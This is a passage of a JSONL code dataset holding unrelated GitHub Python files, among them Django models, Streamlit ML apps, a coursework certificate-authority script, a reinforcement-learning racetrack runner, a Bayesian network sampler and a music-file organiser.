self.delete() \n\n class Meta:\n constraints = [\n UniqueConstraint(\n fields=(\"id_str\",),\n name=\"unique_mastodon_id_str\",\n ),\n ]\n\nclass MastodonPushSubscription(models.Model):\n pk = 'X'\n\n singleton = models.CharField(max_length=1, null=False, primary_key=True, default=pk)\n privkey = models.CharField(max_length=100)\n auth = models.BinaryField()\n foreign_id = models.IntegerField()\n endpoint = models.URLField()\n alerts = models.JSONField()\n server_key = models.CharField(max_length=100)\n policy = models.CharField(max_length=10)\n\n def __str__(self):\n return self.endpoint\n \nclass MastodonPush(models.Model):\n access_token = models.CharField(max_length=50, null=True)\n body = models.TextField(null=True)\n icon = models.URLField(null=True)\n notification_id = models.CharField(max_length=40, null=True)\n notification_type = models.CharField(max_length=10, null=True)\n preferred_local = models.CharField(max_length=100, null=True)\n title = models.CharField(max_length=200, null=True)\n result = models.TextField(null=True)","repo_name":"blineberry/orangegnome","sub_path":"syndications/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":31506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36452239305","text":"import glob\nimport netCDF4 as nc\nfs=glob.glob(\"bZoneProfs/*clutter*.nc\")\nimport matplotlib.pyplot as plt\nclutDepthL=[]\njL=[]\nbzdL=[]\nbcfL=[]\nimport numpy as np\nfor f in sorted(fs):\n fh=nc.Dataset(f)\n bcf=fh[\"bcFree\"][:]\n bsfc=fh[\"bsfc\"][:]\n jRay=fh[\"jRay\"][:]\n pType=fh[\"pType\"][:]\n a=np.nonzero(pType[:,0]==1)\n bzdL.extend(fh[\"bzd\"][a[0]])\n\n jL.extend(abs(jRay[a[0]]-24))\n clutDepthL.extend(bsfc[a[0],0]-bcf[a])\n bcfL.extend(bcf[a])\n\njL=np.array(jL)\nclutDepthL=np.array(clutDepthL)\nbzdL=np.array(bzdL)\nbcfL=np.array(bcfL)\na=np.nonzero(clutDepthL==clutDepthL)\nclutDepthL=clutDepthL[a]\njL=jL[a]\nbzdL=bzdL[a]\nbcfL=bcfL[a]\nfor j in range(13,24):\n a=np.nonzero((jL==j) & (bzdL>165))\n b=np.nonzero((bzdL[a]-bcfL[a])>0)\n #print(\n a2=np.nonzero((jL==j) & (bzdL<165))\n b2=np.nonzero((bzdL[a2]-bcfL[a2])>0)\n print(len(a[0]),clutDepthL[a].mean(),len(b[0])/len(a[0]),\\\n len(a2[0]),clutDepthL[a2].mean(),len(b2[0])/len(a2[0]))\n\nplt.hist(clutDepthL)\n","repo_name":"mgrecu35/GPM_Research","sub_path":"bZone/clutDistrib.py","file_name":"clutDistrib.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43606251200","text":"import os\nfrom building import *\n\ncwd = GetCurrentDir()\n\nsrc = []\npath = []\n\nsrc += Glob('arm-2d-dev/Library/Source/*.c')\nsrc += Glob('arm-2d-dev/Helper/Source/*.c')\nsrc += Glob('arm-2d-dev/examples/common/asset/*.c')\nsrc += Glob('arm-2d-dev/examples/common/benchmark/*.c')\nsrc += Glob('arm-2d-dev/examples/common/controls/*.c')\npath += [cwd + '/arm-2d-dev/Library/Include']\npath += [cwd + '/arm-2d-dev/Helper/Include']\npath += [cwd + '/arm-2d-dev/examples/common/benchmark']\npath += [cwd + '/arm-2d-dev/examples/common/controls']\n\nif GetDepend('TINYSQUARE_USING_PIKASCRIPT'):\n for root, dirs, files in os.walk(cwd + '/pikascript'):\n for dir in dirs:\n src += Glob(os.path.join(root,dir,'*.c'))\n path += [os.path.join(root,dir)]\n os.chdir('pikascript')\n os.system(os.getcwd() + '/' + 'rust-msc-latest-win10.exe')\n\ngroup = DefineGroup('TinySquare', src, depend = ['PKG_USING_TINYSQUARE'], CPPPATH = path)\n\nReturn('group')\n","repo_name":"AlgoOy/TinySquare","sub_path":"library/SConscript","file_name":"SConscript","file_ext":"","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"31033549033","text":"from enum import Enum, unique\n\n# 为这样的枚举类型定义一个class类型,然后,每个常量都是class的一个唯一实例。Python提供了Enum类来实现这个功能:\nMonth = Enum(\"Month\", ('Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec'))\n# 枚举它的所有成员:\n\nfor name, member in Month.__members__.items():\n print(name, '=>', member, ',', member.value)\n\n\n# value属性则是自动赋给成员的int常量,默认从1开始计数。\n# 如果需要更精确地控制枚举类型,可以从Enum派生出自定义类:\n\n@unique\nclass WeekDays(Enum):\n Sun = 0 # Sun的value被设定为0\n Mon = 1\n Tue = 2\n Wed = 3\n Thu = 4\n Fri = 5\n Sat = 6\n\n\n# @unique装饰器可以帮助我们检查保证没有重复值。\n# 访问这些枚举类型可以有若干种方法:\nday1 = WeekDays.Mon\nprint(day1)\nprint(WeekDays.Tue)\nprint(WeekDays[\"Tue\"])\nprint(WeekDays.Tue.value)\nprint(day1 == WeekDays.Tue)\nprint(day1 == WeekDays.Mon)\n# 枚举所有成员\nfor name, member in WeekDays.__members__.items():\n print(name, \"--\", member, \"--\", member.value)\n\n\n# 练习\n# 把Student的gender属性改造为枚举类型,可以避免使用字符串:\n@unique\nclass Gender(Enum):\n Male = 0\n Female = 1\n\n\nclass Student2(object):\n def __init__(self, name, gender):\n self.name = name\n self.gender = gender\n\n\n# 测试:\nbart = Student2('Bart', Gender.Male)\nif bart.gender == Gender.Male:\n print('测试通过!')\nelse:\n print('测试失败!')\n","repo_name":"whoareufcu/MyPython","sub_path":"test019_枚举.py","file_name":"test019_枚举.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27801371397","text":"import streamlit as st\r\nfrom sklearn import datasets\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nfrom sklearn.svm import SVC\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn.tree import DecisionTreeClassifier\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.metrics import accuracy_score\r\nfrom sklearn.decomposition import PCA\r\nfrom sklearn.preprocessing import MinMaxScaler, StandardScaler\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\n\r\ndef get_dataset(dataset_name):\r\n if dataset_name == \"Iris\":\r\n data = datasets.load_iris()\r\n elif dataset_name == \"Breast Cancer\":\r\n data = datasets.load_breast_cancer()\r\n elif dataset_name == \"Wine\":\r\n data = datasets.load_wine()\r\n X = data.data\r\n y = data.target\r\n return X, y\r\n\r\ndef add_parameter_ui(clf_name):\r\n params = dict()\r\n if clf_name == \"KNN\":\r\n K = st.sidebar.slider(\"K\",1,15)\r\n params[\"K\"] = K\r\n elif clf_name == \"SVM\":\r\n C = st.sidebar.slider(\"C\",0.01,10.0)\r\n params[\"C\"] = C\r\n elif clf_name == \"Decision Tree\":\r\n max_depth = st.sidebar.slider(\"max_depth\", 2, 15)\r\n params[\"max_depth\"] = max_depth\r\n else:\r\n max_depth = st.sidebar.slider(\"max_depth\", 2, 15)\r\n n_estimators = st.sidebar.slider(\"n_estimators\", 1,100)\r\n params[\"max_depth\"] = max_depth\r\n params[\"n_estimators\"] = n_estimators\r\n return params\r\n\r\ndef get_classifier(clf_name, params):\r\n if clf_name == \"KNN\":\r\n clf = KNeighborsClassifier(n_neighbors=params[\"K\"])\r\n elif clf_name == \"SVM\":\r\n clf = SVC(C=params[\"C\"])\r\n elif clf_name == \"Decision Tree\":\r\n clf = DecisionTreeClassifier(max_depth=params[\"max_depth\"],random_state=1)\r\n else:\r\n clf = RandomForestClassifier(n_estimators=params[\"n_estimators\"],\r\n max_depth=params[\"max_depth\"],random_state=1)\r\n return clf\r\n\r\ndef scale_data(X,method):\r\n if method == \"Standard Scaler\":\r\n scaler = StandardScaler()\r\n X = scaler.fit_transform(X)\r\n elif method == \"Min Max Scaler\":\r\n scaler = MinMaxScaler()\r\n X = scaler.fit_transform(X)\r\n else:\r\n X = X\r\n return X\r\n\r\nst.title(\"Simple Machine Learning Web App\")\r\n\r\nst.write(\"\"\"\r\n## Explore different Machine Learning classifier\r\n\"\"\")\r\nst.write(\"\"\"\r\n \"\"\")\r\n\r\ndataset_name = st.sidebar.selectbox(\"Select Dataset\", (\"Iris\",\"Breast Cancer\",\"Wine\"))\r\n\r\nclassifier_name = st.sidebar.selectbox(\"Select Classifier\",\r\n (\"KNN\",\"SVM\",\"Decision Tree\",\"Random Forest\"))\r\n\r\nscaling_method = st.sidebar.selectbox(\"Select Feature-Scaling Method\",\r\n (\"None\",\"Standard Scaler\",\"Min Max Scaler\"))\r\n\r\nX, y = get_dataset(dataset_name)\r\nst.write(\"shape of dataset\", X.shape)\r\nst.write(\"number of classes\", len(np.unique(y)))\r\n\r\nX = scale_data(X,scaling_method)\r\n\r\nparams = add_parameter_ui(classifier_name)\r\n\r\n\r\n\r\nclf = get_classifier(classifier_name,params)\r\n\r\n# Classification\r\nX_train, X_test, y_train, y_test = train_test_split(X,y, test_size=0.2, random_state=1)\r\n\r\nclf.fit(X_train,y_train)\r\ny_predict = clf.predict(X_test)\r\n\r\nacc = accuracy_score(y_test,y_predict)\r\nst.write(f\"classifier = {classifier_name}\")\r\nst.write(f\"accuracy = {acc}\")\r\n\r\n# PLOT\r\npca = PCA(2)\r\nX_projected = pca.fit_transform(X)\r\n\r\nx1 = X_projected[:, 0]\r\nx2 = X_projected[:, 1]\r\n\r\nfig = plt.figure()\r\nplt.scatter(x1, x2, c=y, alpha=0.8, cmap=\"viridis\")\r\nplt.xlabel(\"Principal Component 1\")\r\nplt.ylabel(\"Principal Component 2\")\r\nplt.colorbar()\r\n\r\nst.pyplot(fig)\r\n\r\n# TODO\r\n# Add more parameters\r\n# Add more classifier\r\n# Add visualization of classifier boundaries\r\n\r\n\r\n","repo_name":"janS95/simple_ml_web_app","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3141119357","text":"# Import libraries and dependencies\r\nimport streamlit as st\r\nimport pandas as pd\r\nfrom sklearn.cluster import KMeans\r\nimport matplotlib.pyplot as plt\r\nimport plotly.express as px\r\nfrom PIL import Image\r\n\r\n# Load images\r\nnfl_logo = Image.open('images/Logo.png')\r\nplayers = Image.open('images/players.jpg')\r\n\r\n# Read csv file with players data\r\ndf = pd.read_csv(\"data.csv\")\r\n\r\n# Group by player and get average scores\r\ndf_grouped = df.groupby(\"Player\").mean().reset_index()\r\n\r\n# Get back players' positions \r\ndf = pd.merge(df_grouped, df[[\"Player\",\"Position\"]], on ='Player', how ='inner').drop_duplicates()\r\n\r\n# Round scores to 2 decimlas values\r\ndf[\"FPTS\"] = round(df[\"FPTS\"],2)\r\ndf[\"FPTS/G\"] = round(df[\"FPTS/G\"],2)\r\n\r\n# Load NFL Logo image in APP\r\nst.image(nfl_logo, use_column_width=\"always\")\r\n#tryhing to add a gif image\r\n#st.markdown(\"![Alt Text](https://giphy.com/gifs/nfl-49ers-san-francisco-l1AvAJ3Ixl96eBR60)\")\r\n\r\n# User's information input section on sidebar\r\nst.sidebar.header(\"My Information\")\r\nst.sidebar.text_input(\"First Name\")\r\nst.sidebar.text_input(\"Last Name\")\r\nst.sidebar.text_input(\"Fantasy Team Name\")\r\nst.sidebar.radio(\"Gender\",options=[\"Male\",\"Female\",\"Other\"])\r\nst.sidebar.number_input(\"Age\",min_value=18, max_value=100, value=18, step=1)\r\nst.sidebar.selectbox(\"Favorite Team\", options=[\"Arizona Cardinals\",\r\n\t\t\t\t\t\t\t\t\t\t\t\t\"Atlanta Falcons\",\r\n\t\t\t\t\t\t\t\t\t\t\t\t\"Baltimore Ravens\",\r\n\t\t\t\t\t\t\t\t\t\t\t\t\"Buffalo Bills\",\r\n\t\t\t\t\t\t\t\t\t\t\t\t\"Carolina Panthers\",\r\n\t\t\t\t\t\t\t\t\t\t\t\t\"Chicago Bears\",\r\n\t\t\t\t\t\t\t\t\t\t\t\t\"Cincinnati Bengals\",\r\n\t\t\t\t\t\t\t\t\t\t\t\t\"Cleveland Browns\",\r\n\t\t\t\t\t\t\t\t\t\t\t\t\"Dallas Cowboys\",\r\n\t\t\t\t\t\t\t\t\t\t\t\t\"Denver Broncos\",\r\n\t\t\t\t\t\t\t\t\t\t\t\t\"Detroit Lions\",\r\n\t\t\t\t\t\t\t\t\t\t\t\t\"Green Bay Packers\",\r\n\t\t\t\t\t\t\t\t\t\t\t\t\"Houston Texans\",\r\n\t\t\t\t\t\t\t\t\t\t\t\t\"Indianapolis Colts\",\r\n\t\t\t\t\t\t\t\t\t\t\t\t\"Jacksonville Jaguars\",\r\n\t\t\t\t\t\t\t\t\t\t\t\t\"Kansas City Chiefs\",\r\n\t\t\t\t\t\t\t\t\t\t\t\t\"Miami Dolphins\",\r\n\t\t\t\t\t\t\t\t\t\t\t\t\"Minnesota Vikings\",\r\n\t\t\t\t\t\t\t\t\t\t\t\t\"New England Patriots\",\r\n\t\t\t\t\t\t\t\t\t\t\t\t\"New Orleans Saints\",\r\n\t\t\t\t\t\t\t\t\t\t\t\t\"NY Giants\",\r\n\t\t\t\t\t\t\t\t\t\t\t\t\"NY Jets\",\r\n\t\t\t\t\t\t\t\t\t\t\t\t\"Las Vegas Raiders\",\r\n\t\t\t\t\t\t\t\t\t\t\t\t\"Philadelphia Eagles\",\r\n\t\t\t\t\t\t\t\t\t\t\t\t\"Pittsburgh Steelers\",\r\n\t\t\t\t\t\t\t\t\t\t\t\t\"Los Angeles Chargers\",\r\n\t\t\t\t\t\t\t\t\t\t\t\t\"San Francisco 49ers\",\r\n\t\t\t\t\t\t\t\t\t\t\t\t\"Seattle Seahawks\",\r\n\t\t\t\t\t\t\t\t\t\t\t\t\"Los Angeles Rams\",\r\n\t\t\t\t\t\t\t\t\t\t\t\t\"Tampa Bay Buccaneers\",\r\n\t\t\t\t\t\t\t\t\t\t\t\t\"Tennessee Titans\",\r\n\t\t\t\t\t\t\t\t\t\t\t\t\"Washington Football Team\"])\r\n\r\n# Instructions section\r\nst.header(\"Instructions\")\r\nst.markdown(\"Select players position. Then specifiy what round you will be drafting in. Click the 'Get best player available' button. The result will provide you with the best player available for your fantasy team.\")\r\nst.markdown(\"LETS GET STARTED\")\r\n\r\n# Drafting section\r\nst.header(\"Place 'Sure' Bet!\")\r\n\r\n# Load players; image\r\nst.image(players, use_column_width=\"always\")\r\n\r\n# Position radio button\r\nposition = st.radio(\"Please select the player's position:\", options=df[\"Position\"].unique())\r\n\r\n# Round select \r\nround_ = st.number_input(\"Specify what round you are drafting in:\",min_value=1, max_value=10, value=1, step=1)\r\n# Run button\r\nif st.button(\"Get best player available\"):\r\n\r\n\t# Filter dataframe with selected position only\r\n\tdf_sorted = df[df[\"Position\"]==position].sort_values(\"FPTS\", ascending=False)\r\n\t# Transpose dataframe\r\n\tst.dataframe(df_sorted.transpose().iloc[:,round_-1:round_])\r\n\r\n\t# K-Means Clustering Algorithm\r\n\tst.header(\"Players Clusters\")\r\n\tst.markdown(f\"Now that we have found the best player in the {position} position, it would be interesting to know how players could be grouped into 3 clusters: great players, decent players and bad players based on their historical Fanatsy Points.\")\r\n\tst.markdown(\"In order to acheve this, lets apply **machine learning**! For this task, we will be applying an unsupervised machine learning technique for groupuing the players: K-Mean Clustering. Players in segment 2 will be considered as great players; players in segment 1 will be considered as decent players; and players in segment 0 will be considered as bad players.\")\r\n\r\n\t# Set \"Player\" column as index for the dataframe\r\n\tdf_sorted.set_index(\"Player\",inplace=True)\r\n\r\n\t# Extract only FPTS and FPTs/G columns for analysis\r\n\tdf_sorted = df_sorted[[\"FPTS\",\"FPTS/G\"]]\r\n\r\n\t# Instantiate KM model and fit it to the data\r\n\tmodel = KMeans(n_clusters=3, random_state=1).fit(df_sorted)\r\n\t\r\n\t# Get players segments\r\n\tplayer_segments = model.labels_\r\n\t\r\n\t# Add \"Player Segment\" column to dataframe\r\n\tdf_sorted[\"Player Segment\"] = player_segments\r\n\r\n\t# Reset the index\r\n\tdf_sorted.reset_index(inplace=True)\r\n\r\n\t# Build interactive plotly scatter plot\r\n\tfig = px.scatter(\r\n\t\tdf_sorted,x=df_sorted[\"FPTS\"], \r\n\t\ty=df_sorted[\"FPTS/G\"], \r\n\t\tcolor=df_sorted[\"Player Segment\"], \r\n\t\thover_data=[\"Player\"], \r\n\t\ttitle=\"Player's Clusters based on Performance\"\r\n\t\t\r\n\t)\r\n\tst.plotly_chart(fig)\r\n\r\n\tst.markdown(\"Great! The scatter plot above allows us to identify which player belongs to which cluster, and this should help us make a better decision when drafting them.\")\r\n\tst.markdown(f\"Finally, let's take a look at the data set of {position} players sorted by their Fantasy Points in descending order:\")\r\n\r\n\t#3 Visualize filtered dataframe\r\n\tst.dataframe(df_sorted, width=5000)","repo_name":"Schaakattack/Sure_Bet","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5203,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"41698465541","text":"import pandas as pd\nimport numpy as np\n\n\ndef create_df(col_names, data=None, name=None):\n '''pd.DataFrame(\n [('Ziggy Stardust', 1), ('Aladdin Sane', 1), ('Pin Ups', 1)],\n columns=['title','toprank'])'''\n if data is None:\n df = pd.DataFrame(columns=col_names)\n else:\n df = pd.DataFrame({col: data for col in col_names})\n\n if name is not None:\n df.name = name\n return df\n","repo_name":"GabriellaPeng/Testing","sub_path":"code_da/get_data/load_df.py","file_name":"load_df.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41174181848","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.frontal),\n path('prueba/', views.prueba, name='prueba'),\n path('enviar/', views.enviar, name='enviar'),\n path('index.html/', views.peticiones, name='peticiones'),\n path('index.html/FFU.html/', views.FFU, name='FFU'),\n path('index.html/FFC.html/', views.FFC, name='FFC'),\n path('ayuda/', views.archivo, name='ayuda'),\n]","repo_name":"Diegomrza/IPC2_P3_1S_2021","sub_path":"misitio/myapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26719372699","text":"\n# standard libraries\nimport logging\nimport time\nfrom _thread import start_new_thread\nimport traceback\n\n# local library crypto\nimport run_node\nfrom run_node import servers_config_data, nodes_config_data, config, KEY_CHARSET, SENTINEL\nfrom run_node import SKca\nfrom crypto import KeyManager, DES\nimport rsa\nfrom node import Node\nfrom server import Server\n\n# ID for this node in PKI\nID_pki = 'ID-CA'\n\n# corresponding section in configuration file\nSECTION = 'CertificateAuthority'\n# load server data\nSERVER = servers_config_data[SECTION]\n# load node data\nNODE = nodes_config_data[SECTION]\n\n# RSA(.) denotes RSA encryption with the specified public key\n# DES(.) means DES encryption with the specified DES key\n# Sign(.) is RSA signature generation with the specified private key\n\n\ndef receiveThread(server):\n old_tb = None\n exit_instruction = f'Type \"{SENTINEL}\" to exit: '\n print(end=exit_instruction, flush=True)\n # loop indefinitely\n while True:\n try:\n print()\n print()\n # (a) application server registration to obtain its public/private\n DES_tmpl, ID_s = receive_certificate_registration(server)\n send_certificate(server, DES_tmpl, ID_s)\n\n # repeat the exit instruction\n print(end=exit_instruction, flush=True)\n # accept next connection\n server.acceptNextConnection()\n except Exception as e:\n tb = traceback.format_exc()\n # don't repeat the trackback\n if (tb != old_tb):\n print(file=stderr)\n logging.error(tb)\n old_tb = tb\n print(end=exit_instruction, flush=True)\n # end while True\n\n\ndef respondCertification(node_data, server_data):\n # configure the logger\n logging.basicConfig(level=logging.INFO)\n\n # create the Certificate Authority server\n AD_ca = f'{server_data.addr}:{server_data.port}'\n logging.info(f'{node_data.connecting_status} {AD_ca} . . .')\n server = Server(server_data.addr, server_data.port)\n\n start_new_thread(receiveThread, (server,))\n\n while True:\n # TODO: your code here\n\n # accept user input until SENTINEL given\n msg_string = input()\n if msg_string == SENTINEL:\n break\n\n # close the node\n server.close()\n\n\ndef receive_certificate_registration(server):\n # (1Rx) S -> CA: RSA[PKca][K_tmpl||ID_s||TS1]\n # receive the message\n cipher_msg = run_node.recv_blocking(server).decode(KEY_CHARSET)\n print(f'(a1) CA Received: {cipher_msg}')\n # decode the registration\n plain_msg = rsa.decode(*SKca, cipher_msg)\n # split it into its fields\n K_tmpl_str, ID_s, TS1 = plain_msg.split('||')\n # encode the key, and create its DES object\n K_tmpl_byts = K_tmpl_str.encode(KEY_CHARSET)\n DES_tmpl = DES(K_tmpl_byts)\n print(f'(a1) CA found key: {K_tmpl_byts}')\n print()\n return (DES_tmpl, ID_s)\n\n\ndef send_certificate(server, DES_tmpl, ID_s):\n # (2Tx) CA -> S: DES[K_tmpl][PKs||SKs||Cert_s||ID_s||TS2] s.t.\n # Cert_s = Sign[SKca][ID_s||ID_ca||PKs]\n # select a key for Application server AS\n key_s = rsa.selectKey()\n PKs, SKs = rsa.split_key_pair(key_s)\n # convert to strings\n PKs_str, SKs_str = (rsa.key2str(k) for k in (PKs, SKs))\n # create the certificate Cert_s\n Cert_s_plain = f'{ID_s}||{ID_pki}||{PKs_str}'\n Cert_s_cipher = rsa.encode(*SKca, Cert_s_plain)\n # get a time stamp\n TS2 = time.time()\n # concatenate the message\n certificate_msg_plain = f'{PKs_str}||{SKs_str}||{Cert_s_cipher}||{ID_s}||{TS2}'\n certificate_msg_cipher = DES_tmpl.encrypt(certificate_msg_plain)\n print(f'(a2) CA encrypted: {certificate_msg_cipher}')\n print(''.join((f'(a2) CA generated: ', str({'PKs': PKs, 'SKs': SKs}))))\n print(f'(a2) CA signed: {Cert_s_cipher}')\n print()\n # send the message (already in bytes)\n server.send(certificate_msg_cipher)\n\n\n# run the server until SENTINEL is given\nif __name__ == '__main__':\n respondCertification(NODE, SERVER)\n# end if __name__ == '__main__'\n\n","repo_name":"lduran2/cis3319-wireless_networks_security","sub_path":"lab01/CertificateAuthority.py","file_name":"CertificateAuthority.py","file_ext":"py","file_size_in_byte":4073,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"12393941854","text":"import sys\nimport os\nimport pathlib\nimport logging\nimport statistics\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nPATH_TO_SRC_DIR = os.path.join(pathlib.Path(__file__).parent.resolve(), \"../\", \"src/\")\nsys.path.insert(0, PATH_TO_SRC_DIR)\n\nfrom data_utils.race_track import RaceTrackLoader, RaceTrack, RaceCar\nfrom learning_algorithms.racetrack_value_iteration import RaceTrackValueIteration, QLearning, SARSA\n\nlog_level = logging.INFO\nLOG = logging.getLogger(__name__)\nLOG.setLevel(log_level)\nhandler = logging.StreamHandler(sys.stdout)\nhandler.setLevel(log_level)\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nhandler.setFormatter(formatter)\nLOG.addHandler(handler)\n\nif __name__ == \"__main__\":\n learning_type = sys.argv[1] # First arg determines learning type, accepts value/Q/SARSA\n track_name = sys.argv[2] # Second arg determines track type. accepts L/O/R\n max_iterations = int(sys.argv[3]) # Third arg is an integer that determines the number of iterations to run\n crash_protocol = sys.argv[4] # Fourth arg determines the crash policy, if arguement is \"reset\", a crash resets the\n # car to it's start position...\n\n # Determine track type\n if \"L\" in track_name:\n LOG.info(\"Learning L shaped track\")\n rt = RaceTrackLoader.LoadLTrack()\n elif \"R\" in track_name:\n LOG.info(\"Learning R shaped track\")\n rt = RaceTrackLoader.LoadRTrack()\n elif \"O\" in track_name:\n LOG.info(\"Learning O shaped track\")\n rt = RaceTrackLoader.LoadOTrack()\n else:\n LOG.fatal(f\"{track_name} not a supported track name\")\n exit()\n # Determine crash protocol\n if \"reset\" in crash_protocol:\n reset_on_crash = True\n LOG.info(\"Using crash policy: crash means RESET\")\n else:\n reset_on_crash = False\n LOG.info(\"Using crash policy: crash means STOP\")\n # Print track\n rt.print_track()\n start_x, start_y = rt.start_positions()[0] # Car will always start at the first start position of each track...\n rc = RaceCar(rt, start_x, start_y) # Initialize racecar\n\n # Initialize learning model\n if \"value\" in learning_type:\n LOG.info(f\"Performing value iteration with {max_iterations} iterations through state space\")\n learning_model = RaceTrackValueIteration(rt, rc, 0.80, max_iterations, reset_on_crash)\n if \"Q\" in learning_type:\n LOG.info(f\"Performing Q learning with {max_iterations} episodes\")\n # Older stop policy tests used LR 0.25. Reset policy tests used 0.75\n learning_model = QLearning(rt, rc, learning_rate=0.25, max_episodes=max_iterations,\n crash_means_restart=reset_on_crash, discount_rate=0.90)\n if \"SARSA\" in learning_type:\n LOG.info(f\"Performing SARSA learning with {max_iterations} episodes\")\n learning_model = SARSA(rt, rc, learning_rate=0.25, max_episodes=max_iterations,\n crash_means_restart=reset_on_crash, discount_rate=0.90)\n # Learn the policy\n learning_model.learn_policy()\n\n\n\n","repo_name":"notmaurox/pyml","sub_path":"learning_examples/run_racetrack_reinforcement_learning.py","file_name":"run_racetrack_reinforcement_learning.py","file_ext":"py","file_size_in_byte":3030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25608658312","text":"from typing import List, Dict\n\nimport torch\nfrom bayesian_network.common.torch_settings import TorchSettings\n\nfrom bayesian_network.interfaces import IBayesianNetworkSampler\nfrom bayesian_network.bayesian_network import BayesianNetwork, Node\n\n\nclass TorchBayesianNetworkSampler(IBayesianNetworkSampler):\n def __init__(self, bayesian_network: BayesianNetwork, torch_settings: TorchSettings):\n self.torch_settings = torch_settings\n self.bayesian_network = bayesian_network\n\n self.samplers: Dict[Node, NodeSampler] = {\n node: NodeSampler(node)\n for node\n in bayesian_network.nodes\n }\n\n def sample(self, num_samples: int, nodes: List[Node]) -> torch.Tensor:\n num_nodes = len(nodes)\n\n samples = torch.empty((num_samples, num_nodes), device=self.torch_settings.device, dtype=torch.int32)\n\n for i_sample in range(num_samples):\n samples[i_sample, :] = self._sample_single_trial(nodes)\n\n return samples\n\n def _sample_single_trial(self, nodes: List[Node]) -> torch.tensor:\n states = dict()\n\n for (i, node) in enumerate(nodes):\n states[node] = self._sample_single_node(node, states)\n\n return torch.tensor([states[node] for node in nodes], device=self.torch_settings.device)\n\n def _sample_single_node(self, node: Node, states: Dict[Node, torch.tensor]) -> torch.tensor:\n for parent in self.bayesian_network.parents[node]:\n if parent not in states:\n states[parent] = self._sample_single_node(parent, states)\n\n parent_states = torch.tensor([states[parent] for parent in self.bayesian_network.parents[node]], device=self.torch_settings.device)\n return self.samplers[node].sample(parent_states)\n\n\nclass NodeSampler:\n def __init__(self, node: Node):\n self.cpt = node.cpt\n\n def sample(self, parents_states: torch.tensor) -> torch.tensor:\n p = self.cpt[tuple(parents_states)]\n\n return torch.multinomial(p, 1, replacement=True).to(torch.int32)\n","repo_name":"Pim-Mostert/BayesianNetwork","sub_path":"bayesian_network/samplers/torch_sampler.py","file_name":"torch_sampler.py","file_ext":"py","file_size_in_byte":2042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14610464285","text":"import os\nimport pymssql\n\nfrom os import path\nfrom sqlalchemy.orm import sessionmaker, Session\n\nclass MoveFileStep:\n priority = 70\n step_name = 'MoveFile'\n\n def execute(self, file_name: str, db_session: sessionmaker, conn: pymssql.Connection) -> (str, bool):\n # Get the folder we are moving the music to.\n base_folder = './shares/music'\n\n # Get the info to compute the new location for the song.\n cursor: pymssql.Cursor = conn.cursor()\n cursor.execute('EXEC sp_SelectSongLocationInfo %s', file_name)\n artist, album, track_number, title = cursor.fetchone()\n\n # Update the values to be path safe.\n artist = artist.replace('/', '_')\n album = album.replace('/', '')\n title = title.replace('/', '')\n\n # Get the filder name.\n folder = path.join(base_folder, artist + ' - ' + album)\n # Get the file name.\n new_file_name = str(track_number) + ' - ' + title\n\n # Create the path if it does nto exist.\n if not path.isdir(folder):\n os.mkdir(folder)\n\n # Get the path without the extension.\n base_path = path.join(folder, new_file_name)\n new_file_path = base_path + '.mp3'\n lyrics_path = base_path + '.txt'\n\n # Get the lyrics\n cursor.execute('EXEC sp_SelectLyrics %s', file_name)\n lyrics = cursor.fetchone()[0]\n\n # If we have lyrics, save them.\n if lyrics is not None:\n with open(lyrics_path, 'w') as f:\n f.write(lyrics)\n\n # Move the music file.\n os.rename(file_name, new_file_path)\n\n # Update new information.\n cursor.execute('EXEC sp_UpdatePath %s, %s', (file_name, new_file_path))\n\n cursor.close()\n\n return new_file_path, True\n","repo_name":"clcrutch/music-org","sub_path":"steps/MoveFile.py","file_name":"MoveFile.py","file_ext":"py","file_size_in_byte":1780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17003633451","text":"# -*- coding: utf-8 -*-\nimport json # noqa: F401\nimport os # noqa: F401\nimport pickle\nimport shutil\nimport time\nimport unittest\nfrom configparser import ConfigParser\nfrom os import environ\nimport zipfile\nimport csv\n\nfrom unittest.mock import patch\n\nfrom CompoundSetUtils.CompoundSetUtilsImpl import CompoundSetUtils\nfrom CompoundSetUtils.CompoundSetUtilsServer import MethodContext\nfrom CompoundSetUtils.authclient import KBaseAuth as _KBaseAuth\nfrom installed_clients.DataFileUtilClient import DataFileUtil\nfrom installed_clients.WorkspaceClient import Workspace as workspaceService\n\n\nclass CompoundSetUtilsTest(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n token = 